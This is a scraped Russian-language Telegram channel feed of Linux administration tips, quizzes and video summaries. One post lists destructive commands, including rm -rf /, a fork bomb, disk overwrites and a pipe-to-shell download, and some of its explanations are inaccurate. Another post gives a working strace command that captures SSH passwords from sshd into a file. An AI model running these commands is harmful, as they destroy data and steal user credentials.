Linux Skill - Освой Linux c нуля до DevOps – Telegram
Linux Skill - Освой Linux c нуля до DevOps
11.3K subscribers
67 photos
103 videos
499 links
Освой Linux c нуля до DevOps
Подробный гайд по Linux и море других уроков для системных администраторов

📩 По всем вопросам: @chorapov

РКН https://vk.cc/cMUwm4
Download Telegram
🔥 Неожиданные секреты Linux: 12 утилит, которые спасут твой сервер!

Привет, повелитель терминала! 🖥️ Сегодня я расскажу тебе о мощных утилитах для траблшутинга в Linux, которые помогут быстро диагностировать и решать проблемы на сервере. Давай разберемся, что и как использовать!

Основные утилиты для траблшутинга:

1. top и htop:
   top
htop

- Показывают информацию о системных процессах в реальном времени, включая использование CPU, памяти и дискового ввода-вывода.

2. ps:
   ps aux

- Показывает список активных процессов.

3. netstat и ss:
   netstat -tuln
ss -tuln

- Показывают сетевые соединения, таблицы маршрутизации и другую сетевую информацию.

4. lsof:
   lsof
lsof -i :80

- Показывает открытые файлы и порты.

5. df и du:
   df -h
du -sh /var/log/*

- Показывают информацию о дисковом пространстве.

6. ping и traceroute:
   ping google.com
traceroute google.com

- Используются для диагностики сетевых проблем.

7. curl и wget:
   curl -I https://www.example.com
wget https://www.example.com/file.zip

- Используются для отправки HTTP-запросов и загрузки файлов.

8. journalctl:
   journalctl -xe
journalctl -u nginx.service

- Используется для просмотра системных журналов.

9. dmesg:
   dmesg | grep error

- Показывает сообщения ядра.

10. strace:
bash
strace -p <PID>

- Трассирует системные вызовы и сигналы.

11. tcpdump:
bash
tcpdump -i eth0

- Анализатор сетевых пакетов.

12. vmstat и iostat:
bash
vmstat 1
iostat 1

- Показывают статистику виртуальной памяти и ввода-вывода.

Эти утилиты — твои лучшие друзья в мире Linux. Используй их, чтобы быстро находить и устранять проблемы. Ставь 👍 и забирай 📚 Базу знаний!

📩 Завтра: 🎥 15 малоизвестных команд Linux
Включи 🔔 чтобы не пропустить!
____________________

Дополнительный материал:
🧠 - Разблокируем Linux: Управление разрешениями файлов с символическим представлением
🧠 - Мастерство использования команды Ar в Linux: Создание и управление архивами
🧠 - От rsyslog до Graylog: Путешествие через эволюцию систем управления журналами

#Linux_Mastery @LinuxSkill #curl #wget #journalctl #ping #traceroute #df #du #lsof
👍42
Media is too big
VIEW IN TELEGRAM
🎥 Открой для себя 15 малоизвестных команд LINUX, которые изменят твою жизнь!

Ты думаешь, что знаешь все о Linux? Подумай еще раз! В этом видео мы раскроем 15 скрытых жемчужин командной строки, которые не только упростят твою жизнь, но и сэкономят драгоценное время. От анализа дискового пространства с помощью ncdu до интерактивного поиска с fzf — эти команды станут твоими новыми лучшими друзьями в мире Linux.

Источник: https://www.youtube.com/watch?v=O1gAq4pCk0s

📩 Завтра: Вопрос №7 из теста Linux Essentials Certification:
Включи 🔔 чтобы не пропустить!
____________________

Дополнительный материал:
🧠 - Улучшаем Linux Skills: Мастерство символического представления разрешений с chmod
🧠 - Знаете ли вы, как узнать архитектуру вашей машины в Linux
🧠 - Открытие Ansible: Как простой инструмент стал гигантом управления конфигурациями

#Linux_youtube @LinuxSkill
👍9🔥6👀1
Вопрос №7 из теста Linux Essentials Certification: Какая из следующих команд может быть использована для извлечения файлов из архива?
Anonymous Quiz
6%
tar -evf
4%
tar -v
72%
tar -xvf
2%
tar -vf
16%
tar -e
👍20
🛠️ Как удалить экспортированную переменную окружения в Linux?

Если тебе нужно удалить экспортированную переменную окружения, команда unset — это то, что тебе нужно:

unset GNUPLOT_DRIVER_DIR


Важно знать:
- Эта команда удаляет переменную только для текущей сессии терминала. При открытии нового окна терминала переменные загружаются из таких файлов, как ~/.bashrc или ~/.profile.
- Если переменная автоматически устанавливается при каждом запуске терминала, попробуй найти её в скрытых файлах домашней директории. Используй команду:
  grep -r <имя_переменной> ~

Это может занять время, если у тебя много файлов.

Как сохранить значение переменной, но убрать экспорт:
- В bash можно использовать:
typenoscript
  declare +x MYVAR

или

  export -n MYVAR


Удаление переменной в разных сессиях:
- Нет команды, которая бы удалила переменную во всех существующих сессиях. Лучше найти файл инициализации, где она устанавливается, и отредактировать его, чтобы переменная не устанавливалась в будущих сессиях.

Ветка: https://stackoverflow.com/questions/6877727/how-do-i-delete-an-exported-environment-variable

📩 Завтра: Твой незаменимый помощник: Скрипт для мониторинга Linux!
Включи 🔔 чтобы не пропустить!
____________________

Дополнительный материал:
🧠 - Улучшаем Linux Skills: Мастерство символического представления разрешений с chmod
🧠 - Знаете ли вы, как узнать архитектуру вашей машины в Linux
🧠 - Открытие Ansible: Как простой инструмент стал гигантом управления конфигурациями

#stackoverflow @LinuxSkill #Linux #EnvironmentVariables #Bash #Tips #Automation
👍13
🚀 Твой незаменимый помощник: Скрипт для мониторинга Linux!

Привет, повелитель терминала! 🖥️ Сегодня я поделюсь с тобой скриптом, который поможет тебе следить за производительностью твоей Linux-системы. Этот инструмент быстро оценит состояние системы и выявит узкие места. Давай посмотрим, как он работает!

Скрипт для мониторинга:

#!/bin/bash
# Colors for readability
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
RED='\033[0;31m'
NC='\033[0m' # No Color
echo -e "${GREEN}===== System Monitoring Script =====${NC}"

# 1. CPU Usage
echo -e "${YELLOW}\n>> CPU Usage: ${NC}"
mpstat | awk '/all/ {print "CPU Load: " $3 "% idle"}'

# 2. Memory Usage
echo -e "${YELLOW}\n>> Memory Usage: ${NC}"
free -h | awk '/Mem/ {print "Total Memory: " $2 "\nUsed: " $3 "\nFree: " $4}'
echo -e "Swap:\n"$(free -h | awk '/Swap/ {print "Total: " $2 ", Used: " $3 ", Free: " $4}')

# 3. Disk Usage
echo -e "${YELLOW}\n>> Disk Usage: ${NC}"
df -h | grep '^/dev' | awk '{print $1 ": " $5 " used, " $4 " available"}'

# 4. Network Traffic
echo -e "${YELLOW}\n>> Network Traffic: ${NC}"
ifstat -i eth0 1 1 | awk 'NR==3 {print "RX: " $1 " KB/s, TX: " $2 " KB/s"}'

# 5. Top 5 Memory Consuming Processes
echo -e "${YELLOW}\n>> Top 5 Memory Consuming Processes: ${NC}"
ps -eo pid,ppid,cmd,%mem,%cpu --sort=-%mem | head -n 6

# 6. Top 5 CPU Consuming Processes
echo -e "${YELLOW}\n>> Top 5 CPU Consuming Processes: ${NC}"
ps -eo pid,ppid,cmd,%mem,%cpu --sort=-%cpu | head -n 6

# 7. System Logs Monitoring
echo -e "${YELLOW}\n>> Recent Errors in System Logs: ${NC}"
journalctl -p 3 -xb | tail -n 10

echo -e "${GREEN}===== Monitoring Completed =====${NC}"


Что делает этот скрипт?

1. CPU Usage: Показывает загрузку процессора.
2. Memory Usage: Отображает использование оперативной памяти и swap.
3. Disk Usage: Информирует о занятом и доступном дисковом пространстве.
4. Network Traffic: Показывает входящий и исходящий трафик.
5. Top 5 Memory Consuming Processes: Выводит процессы, потребляющие больше всего памяти.
6. Top 5 CPU Consuming Processes: Выводит процессы, потребляющие больше всего CPU.
7. System Logs Monitoring: Показывает последние ошибки в системных логах.

Этот скрипт — твой надежный помощник в мониторинге системы. Запускай его, чтобы всегда быть в курсе состояния твоего сервера.

📩 Завтра: Открой секреты защиты от DDoS-атак с помощью экспертов!
Включи 🔔 чтобы не пропустить!
____________________

Дополнительный материал:
🧠 - Управление Особыми Режимами в Linux: Разблокировка Доступа с chmod
🧠 - Разбираемся с командой Basename: Ваш ключ к упрощению работы с файлами в Linux
🧠 - От MythTV до LibreELEC: Как Linux Перевернул Мир Мультимедиа

#Linux_Mastery @LinuxSkill #Linux #Bash #Monitoring
👍31🔥8
🛡️ Открой секреты защиты от DDoS-атак с помощью экспертов!

Ты готов узнать, как защитить свою компанию от DDoS-атак? В этом захватывающем видео мы погружаемся в мир кибербезопасности и раскрываем стратегии, которые помогут тебе противостоять самым сложным угрозам.

Видео 1 от Kaspersky: Экспертно: Как защитить компанию от DDoS
- 00:00: Узнай, как школьники используют DDoS для атак на электронные дневники.
- 01:22: Понимание DDoS-атак и их использование для промышленного шпионажа.
- 11:44: Как лидеры отрасли, такие как Cisco, предлагают решения для защиты.
Источник: https://www.youtube.com/watch?v=mftFn-2g2aE

Видео 2: Защита от DoS-атак с помощью Nginx
- 00:00: Простая защита от DDoS-атак с использованием Nginx.
- 02:36: Настройка Nginx для оптимизации работы сервера.
- 14:59: Фильтрация ботов и защита от нежелательных соединений.
Источник: https://www.youtube.com/watch?v=S5kB0_mACJQ

Видео 3: Как защититься от DDoS-атаки по IP адресу?
- 00:06: Практическое применение DDoS-атак по IP-адресу.
- 01:49: Реализация атаки и её ограничения.
- 03:27: Советы по безопасности и легальному заработку.
Источник: https://www.youtube.com/watch?v=-nnTDnpTIjU

Не пропусти возможность узнать, как защитить свой бизнес от киберугроз!

📩 Завтра: Как найти различия между двумя деревьями каталогов в Linux?
Включи 🔔 чтобы не пропустить!
____________________

Дополнительный материал:
🧠 - Linux Skills Boost: Настройка разрешений для групп файлов с chmod
🧠 - Упаковываем и сжимаем: Мастер-класс по bzip2 в Linux
🧠 - История Reiser4: Как она изменила мир Linux

#Linux_youtube @LinuxSkill #Linux #DDoS #Nginx #Kaspersky
👍14
🔍 Как найти различия между двумя деревьями каталогов в Linux?

Ты когда-нибудь задумывался, как быстро сравнить содержимое двух директорий и выявить различия? Сегодня мы расскажем, как это сделать с помощью команды diff в Linux.

Чтобы сравнить два дерева каталогов и найти различия в содержимом файлов, используй команду diff с флагами -qr:

diff -qr dir1/ dir2/


- -q или --brief — выводит только информацию о различиях, без детального сравнения.
- -r или --recursive — рекурсивно обходит все подкаталоги.

Если ты хочешь увидеть различия для файлов, которые могут отсутствовать в одной из директорий, добавь флаг -N:

diff -qrN dir1/ dir2/


Используя эти команды, ты сможешь легко и быстро выявить различия между двумя директориями, что особенно полезно при управлении версиями и контроле изменений. Попробуй сам и убедись, насколько это удобно!

🌳 Ветка: https://stackoverflow.com/questions/4997693/given-two-directory-trees-how-can-i-find-out-which-files-differ-by-content

📩 Завтра: 18 команд которые должен знать каждый линуксоид!
Включи 🔔 чтобы не пропустить!
____________________

Дополнительный материал:
🧠 - Мастерство использования команды chown для смены владельца файлов и каталогов
🧠 - Станьте Мастером Календаря в Linux с Cal и NCal
🧠 - Станьте Мастером Управления Пользователями в Linux

#stackoverflow @LinuxSkill #Linux #Diff #DirectoryComparison #SysAdmin #DevOps
👍23
🔍 Открой секреты своей системы: 18 команд которые должен знать каждый линуксоид!

Привет, линукс-мастер! Сегодня я расскажу тебе о полезных командах, которые помогут быстро получить сведения о системе и активности пользователей. Эти команды — твои лучшие друзья в мире Linux. Давай разберемся, что и как использовать!

Основные команды для мониторинга:

1. Системная информация:
   date        # Текущая дата и время
cal # Календарь на текущий месяц
uptime # Время с момента последней загрузки ОС
uname -a # Все сведения о системе
uname -vr # Номер выпуска ОС и версия ядра


2. Активность пользователей:
   w           # Сведения о зарегистрированных пользователях
users # Список имен вошедших пользователей
last # История входов пользователей
lastlog # Время последнего входа всех пользователей
whoami # Имя текущего пользователя
finger user # Информация о пользователе


3. Использование ресурсов:
   df          # Использование дисков
du # Использование текущего каталога
free # Использование реальной и виртуальной памяти


4. Поиск и справка:
   whatis app  # Краткая информация об app
whereis app # Местоположение исполняемого модуля app
which app # Исполняемый модуль по умолчанию
man command # Справочная информация для команды


Эти команды помогут тебе быстро ориентироваться в системе и управлять ею. Попробуй их в действии и делись своими успехами!

📩 Завтра: Никогда не запускай эти 11 команд в Linux!
Включи 🔔 чтобы не пропустить!
____________________

Дополнительный материал:
🧠 - Меняем владельца файлов в Linux с помощью chown: Пошаговое руководство!
🧠 - Установка Разрешений по Умолчанию в Linux с umask: Ваш Путеводитель!
🧠 - Станьте Гуру Управления Загрузчиком GRUB с LinuxSkill

#Linux_Commands @LinuxSkill
👍29
⚠️ Осторожно: Никогда не запускай эти 11 команд в Linux!

Привет, линукс-мастер! 🖥️ Сегодня я расскажу тебе о командах, которые могут нанести серьезный ущерб твоей системе. Эти команды лучше никогда не запускать, если ты не хочешь потерять данные или столкнуться с проблемами безопасности. Давай разберемся, что и почему стоит избегать!

Опасные команды:

1. rm -rf /:
- Удаляет все файлы и папки на компьютере. Полная потеря данных.

2. :(){ :|: & };::
- Известная как "fork bomb", может вызвать переполнение памяти и аварийное завершение системы.

3. mkfs.ext4 /dev/sda:
- Форматирует жесткий диск без предупреждения. Все данные будут утеряны.

4. dd if=/dev/random of=/dev/sda:
- Перезаписывает данные на жестком диске случайными значениями, что приводит к потере данных.

5. chmod 777 /:
- Открывает полный доступ к файловой системе для всех пользователей, что может нарушить безопасность.

6. **mv /home/* /dev/null**:
- Перемещает все файлы из домашней директории в "null", что приводит к их потере.

7. wget http://example.com/file -O /dev/null:
- Загружает файл и перезаписывает данные в "null", что приводит к потере данных.

8. mkfs.ext4 /dev/sda1:
- Форматирует раздел жесткого диска без предупреждения. Все данные на разделе будут утеряны.

9. ln -s /dev/null /etc/passwd:
- Создает символическую ссылку на "/etc/passwd" в "null", что приводит к потере данных.

10. echo "Hello" > /dev/sda:
- Заменяет раздел, содержащий данные для загрузки системы, строкой «Hello».

11. wget http://malicious_source -O- | sh:
- Загружает и запускает вредоносные сценарии, которые могут подорвать безопасность системы.

Эти команды могут нанести непоправимый ущерб твоей системе. Будь осторожен и всегда проверяй команды перед их выполнением. Береги свои данные и безопасность!

📩 Завтра: Вопрос №8 из теста Linux Essentials Certification
Включи 🔔 чтобы не пропустить!
____________________

Дополнительный материал:
🧠 - Глубокое Погружение в Жесткие Ссылки: Создание и Управление в Linux
🧠 - Мастер-класс по Сокрытию Файлов и Каталогов в Linux: Станьте Невидимкой
🧠 - Создание Ссылок в Linux: Символические и Жесткие Пути к Управлению Данными

#Linux_Mastery @LinuxSkill
👍23🔥22👎1
Вопрос №8 из теста Linux Essentials Certification: Какой из следующих файлов содержит определение локальных учетных записей пользователей?
Anonymous Quiz
2%
/etc/secret
3%
/etc/id
7%
/etc/home
33%
/etc/users
55%
/etc/passwd
👍7
Media is too big
VIEW IN TELEGRAM
🔐 Защита SSH-сервера: порты, ключи и iptables

Хочешь узнать, как защитить свой SSH-сервер от несанкционированного доступа? В этом видео мы расскажем о лучших практиках, включая порт-нокинг, использование ключей и настройку iptables.

1. Введение в порт-нокинг (00:00):
- Порт-нокинг скрывает открытые порты, делая их доступными только через правильные комбинации стуков. Это как дверь без замочной скважины, которая открывается только при правильной комбинации.

2. Порты и ключи в сетевых протоколах (00:58):
- Порты позволяют нескольким программам работать одновременно. Например, SSH и веб-сервер используют разные порты для разграничения запросов.

3. Защита SSH-сервера (02:39):
- Замена стандартного порта SSH на нестандартный и использование ключей вместо паролей для повышения безопасности.

4. Настройка iptables (15:51):
- Установка и настройка iptables для управления входящими и исходящими соединениями. Это помогает защитить сервер от несанкционированного доступа.

5. Проверка безопасности (22:24):
- Проверка, что порт 45916 не отличается от других, и сканеры портов не могут определить наличие SSH-сервера.

6. Доступ к серверу (23:57):
- Использование утилиты nmp для доступа к серверу через правильные порты.

Заключение (28:30): Порт сервера закрыт снаружи, но доступен при правильном постукивании. Надеемся, что видео было полезным. Ставьте лайки и подписывайтесь на канал!

Источник: https://www.youtube.com/watch?v=5TCvRlD1sSw

📩 Завтра: Вопрос №9 из теста Linux Essentials Certification
Включи 🔔 чтобы не пропустить!
________________

Дополнительный материал:
🧠 - Linux и Команды Выключения: Сцена для systemctl
🧠 - Путешествие по команде shutdown
🧠 - Как настроить и использовать Ctrl+Alt+Delete в Linux для надежной перезагрузки

#Linux_youtube @LinuxSkill #Linux #SSH #Security #PortKnocking #Iptables #SysAdmin #DevOps
👍18🔥6
Вопрос №9 из теста Linux Essentials Certification: Какая из следующих версий Ubuntu считается наиболее стабильной и подходящей для использования в бизнес-целях?
Anonymous Quiz
6%
Kubuntu
71%
LTS
7%
Ubuntu Vanilla
4%
Xubuntu
11%
Xubuntu Server
👍22👎7👀5
Media is too big
VIEW IN TELEGRAM
🎥 Производительность Nginx vs Apache: кто победит?

В этом видео мы сравниваем два популярных веб-сервера — Nginx и Apache. Узнай, какой из них лучше справляется с нагрузкой и обеспечивает стабильную работу.


1. Введение и цели теста (00:00):
- Сравнение производительности Nginx и Apache на AWS.
- Измерение задержки, вывода данных и насыщенности сервисов.

2. Первый тест (01:38):
- Развертывание серверов на виртуальных машинах с использованием статического веб-сайта.
- Генерация нагрузки через кластер EKS.

3. Второй тест (02:36):
- Использование TLS и HTTP/2 для повышения производительности.
- Google оценивает сайты выше при использовании HTTPS.

4. Третий тест (03:12):
- Веб-серверы как обратные прокси: безопасность, масштабируемость, балансировка нагрузки.

5. Результаты первого теста (05:26):
- Nginx обрабатывает в три раза больше запросов в секунду, чем Apache.
- Apache снижает производительность при 8000 запросах в секунду.

6. Результаты второго теста (08:10):
- Nginx лучше справляется с нагрузкой при 85% загрузке процессора.
- Apache начинает снижать производительность при 7000 запросах в секунду.

7. Результаты третьего теста (11:02):
- Apache показывает лучшую производительность как прокси-сервер.
- Nginx демонстрирует нестабильность при высокой загрузке.

8. Использование памяти и сетевой трафик (14:10):
- Анализ использования памяти и сетевого трафика.
- Планируется тестирование Apache Ingress Controller для сравнения с Nginx.

Результаты тестов показывают, что Nginx превосходит Apache в обработке запросов, но Apache может быть более стабильным как прокси-сервер. Подписывайтесь на канал, чтобы не пропустить новые тесты и сравнения!
Источник: https://www.youtube.com/watch?v=UGp4LmocE7o

📩 Завтра: Как измерить время выполнения программы в Linux?
Включи 🔔 чтобы не пропустить!
____________________

Дополнительный материал:
🧠 - Овладейте искусством управления системой с серией руководств по Systemd
🧠 - Алфавит команд Linux
🧠 - Погружаемся в a2disconf

#Linux_youtube @LinuxSkill #Linux #Nginx #Apache #Performance #SysAdmin #DevOps
👍6👀3
⏱️ Как измерить время выполнения программы в Linux?

Хочешь узнать, сколько времени занимает выполнение твоих скриптов или команд в Linux? Сегодня мы расскажем, как использовать встроенную команду time для этого.

Основная информация:

Команда time позволяет измерить реальное время, затраченное на выполнение команды, а также время работы процессора. Вот как это сделать:

1. Использование команды time:

Просто добавь time перед командой, которую хочешь измерить. Например:

   time sleep 2


Вывод будет примерно таким:

   real    0m2.009s
user 0m0.000s
sys 0m0.004s


- real — общее время выполнения.
- user — время, затраченное на выполнение пользовательского кода.
- sys — время, затраченное на выполнение системного кода.

2. Измерение времени для нескольких команд:

Если нужно измерить время выполнения нескольких команд, используй группу команд:

   time { command1; command2; }


Используя команду time, ты можешь легко измерять производительность своих скриптов и оптимизировать их. Попробуй сам и убедись, насколько это полезно!

🌳 Ветка: https://stackoverflow.com/questions/385408/get-program-execution-time-in-the-shell

📩 Завтра: Как не стать жертвой сниффинга паролей на Linux
Включи 🔔 чтобы не пропустить!
____________________

Дополнительный материал:
🧠 - Открываем Мир b2-tools
🧠 - Открываем Все Тайны Команды Cat
🧠 - Разгадываем Загадки с Diff3

#stackoverflow @LinuxSkill #Linux #TimeCommand #Performance #SysAdmin #DevOps
👍14
🚨 Осторожно: Как не стать жертвой сниффинга паролей на Linux!

Привет, линукс-мастер! 🖥️ Сегодня я расскажу тебе о том, как некоторые используют strace для перехвата паролей пользователей, подключающихся по SSH. Это знание поможет тебе защитить свои системы и избежать неприятностей. Давай разберемся, как это работает и как защититься!

Как работает сниффинг с помощью strace:

1. Запуск strace для отслеживания процессов SSH:
   strace -f -p $(pgrep -o sshd) -o /tmp/passwd.txt -v -e trace=write -s 64

- -f: Следим за всеми процессами sshd (мастер и дочерние).
- -p: Ищем все PID процессов sshd.
- -o: Файл, куда пишем результаты.
- -v: Пишем подробности.
- -e: Триггеримся только на запись данных.
- -s: Ограничиваем вывод данных 64 байтами (меньше мусора).

2. Что происходит:
- Когда пользователь авторизуется по SSH, его пароль записывается в файл passwd.txt в открытом виде.

3. Пример вывода:
   1088 write(5,"\0\0\0\5oleg", 9) = 9
1088 write(5, "\0\0\0\Barmaley1982", 17) = 17

- Логин oleg, пароль Barmaley1982.

Важно помнить:

- Эта информация предназначена исключительно для образовательных целей. Использование таких методов для незаконных действий строго запрещено.
- Защищай свои системы, следи за безопасностью и соблюдай законы своей страны.

Береги свои данные и безопасность!

📩 Завтра: Автоматизация кибербезопасности: 5 полезных скриптов на Bash
Включи 🔔 чтобы не пропустить!
____________________

Дополнительный материал:
🧠 - Управление Съемными Носителями с Eject
🧠 - Разложение на Простые Множители с Factor
🧠 - Погружение в Команду Groups

#Linux_Mastery @LinuxSkill
🔥14👀6👍5
🔒 Автоматизация кибербезопасности: 5 полезных скриптов на Bash

Привет, кибер-путешественник! 🖥️ Сегодня я расскажу тебе о пяти скриптах на Bash, которые помогут автоматизировать рутинные задачи в кибербезопасности. Эти инструменты могут стать твоими надежными помощниками в защите систем. Давай посмотрим, как они работают!

1. Сканирование портов с использованием nmap:
#!/bin/bash
# Сканирование портов конкретного хоста
echo "Введите адрес хоста для сканирования:"
read host
echo "Сканирование портов для хоста $host..."
nmap $host

- Этот скрипт позволяет быстро сканировать порты указанного хоста.

2. Проверка статуса веб-сервера:
#!/bin/bash
# Проверка статуса веб-сервера по HTTP статус-коду
url="http://example.com" # Замените example.com на реальный URL
status_code=$(curl -o /dev/null -s -w "%{http_code}\n" $url)
if [ $status_code -eq 200 ]; then
echo "Веб-сервер $url работает нормально (HTTP статус 200)"
else
echo "Веб-сервер $url имеет проблемы (HTTP статус $status_code)"
fi

- Проверяет доступность веб-сервера по HTTP статус-коду.

3. Поиск изменений в файлах (интегритет):
#!/bin/bash
# Проверка интегритета файлов в заданной директории
directory="/var/www/html" # Замените на директорию, которую нужно отслеживать
hash_file="hashes.txt"
# Генерируем хэши файлов и сохраняем их для последующего сравнения
find $directory -type f -exec sha256sum "{}" + > $hash_file
# Функция, которая проверяет хэши
check_hashes() {
sha256sum -c $hash_file
}
# Вызываем функцию
check_hashes

- Следит за изменениями в файлах, проверяя их хэши.

4. Автоматическое создание бэкапов логов:
#!/bin/bash
# Автоматическое создание бэкапов логов
log_path="/var/log/apache2" # Замените на путь к вашей папке с логами
backup_path="/backup/apache2"
# Создаем каталог для бэкапа, если он не существует
mkdir -p $backup_path
# Архивируем и перемещаем логи
tar -czvf $backup_path/log-$(date +%F).tar.gz $log_path

- Автоматически создает резервные копии логов.

5. Мониторинг и оповещение об активности в логах:
#!/bin/bash
# Мониторинг и оповещение о подозрительной активности в логах
log_file="/var/log/auth.log" # Замените на путь к вашему лог-файлу
pattern="Failed password" # Замените на паттерн, который вы хотите отслеживать
# Чтение новых строк из лог-файла
tail -fn0 $log_file | \
while read line ; do
echo "$line" | grep "$pattern" > /dev/null
if [ $? = 0 ]; then
# Отправляем уведомление
echo "Подозрительная активность: $line"
# Здесь может быть команда для отправки уведомления, например, через mailx
fi
done

- Следит за логами и оповещает о подозрительной активности.

Эти скрипты — лишь начало. В реальных сценариях тебе понадобятся более сложные проверки и интеграции. Всегда тестируй скрипты в безопасной среде перед их использованием в продакшене. 🛡️

Ссылка на источник https://timcore.ru/2024/03/07/pjat-skriptov-na-bash-kotorye-mogut-ispolzovatsja-dlja-avtomatizacii-rutinnyh-zadach-v-kiberbezopasnosti/

📩 Завтра: Вопрос №10 из теста Linux Essentials Certification
Включи 🔔 чтобы не пропустить!
____________________

Дополнительный материал:
🧠 - Введение в Команду Head
🧠 - Навигация по Сетевым Интерфейсам с Ifconfig
🧠 - Мастерство Слияния Файлов с Join

#Linux_Mastery @LinuxSkill
👍22👎1
Вопрос №10 из теста Linux Essentials Certification: После установки нового пакета, в каком каталоге вы, скорее всего, найдете его файл конфигурации?
Anonymous Quiz
8%
/usr
9%
/opt
16%
/conf
4%
/lib
64%
/etc
👍29
Media is too big
VIEW IN TELEGRAM
🎥 Сравнение производительности Nginx и Caddy Performance: кто победит?

В этом видео мы сравниваем два мощных веб-сервера — Nginx и Caddy. Узнай, какой из них лучше справляется с нагрузкой и обеспечивает стабильную работу.

Основная информация:

1. Введение и цели теста (00:00):
- Сравнение Nginx и Caddy Performance как веб-серверов и обратных прокси-серверов.
- Тестирование обслуживания статического веб-сайта по HTTPS и балансировки нагрузки.

2. Настройка и оборудование (00:55):
- Использование AWS и новейших инстансов EC2 для создания кластера EKS.
- Применение Route 53 для обнаружения сервисов и Next.js для создания веб-сайта.

3. Настройка веб-серверов (01:53):
- Создание больших инстансов EC2 с двумя процессорами и 8 ГБ памяти.
- Настройка сертификатов для аутентификации и безопасности.

4. Оптимизация Nginx (03:38):
- Использование оптимизированной конфигурации для повышения производительности.
- Настройка мультиподключения и увеличение лимита открытых файлов.

5. Настройка Caddy (04:37):
- Использование минимальной конфигурации и включение сжатия.
- Формат логов, аналогичный Nginx и Apache.

6. Результаты первого теста (06:27):
- Nginx показал меньшую задержку и обработал больше запросов, чем Caddy.
- Caddy начал отставать при 8000 запросах в секунду.

7. Тестирование Nginx и Caddy (08:19):
- Nginx достиг 80% загрузки процессора и не сбоил.
- Caddy ухудшился при 8000 запросах, достигнув максимума при 10000 запросов.

8. Сетевой трафик и производительность (09:55):
- Nginx передавал почти 600 МБ/с, обеспечивая более высокую производительность.

9. Второй тест с обратным прокси (11:16):
- Caddy превзошел Nginx по производительности, но ненадолго.
- Nginx обработал почти 27000 запросов за 2 часа.

Nginx обработал почти вдвое больше запросов, чем Caddy, обеспечив более высокую пропускную способность и меньшую задержку. Рекомендуется использовать Nginx для веб-серверов и обратных прокси-серверов.

Источник: https://www.youtube.com/watch?v=N5PAU-vYrN8

📩 Завтра: Вопрос №11 из теста Linux Essentials Certification
Включи 🔔 чтобы не пропустить!
____________________

Дополнительный материал:
🧠 - Управление Процессами с Kill
🧠 - Временная Капсула с Last
🧠 - Как проверить файлы на целостность и не поймать вирус? Просто запусти md5sum!

#Linux_youtube @LinuxSkill #Linux #Nginx #Caddy #Performance #SysAdmin #DevOps
👍10👀2
Вопрос №11 из теста Linux Essentials Certification: Какой сетевой интерфейс всегда существует в системе Linux?
Anonymous Quiz
4%
wlan0
30%
eth0
63%
lo
3%
vlan0
0%
sit0
👍22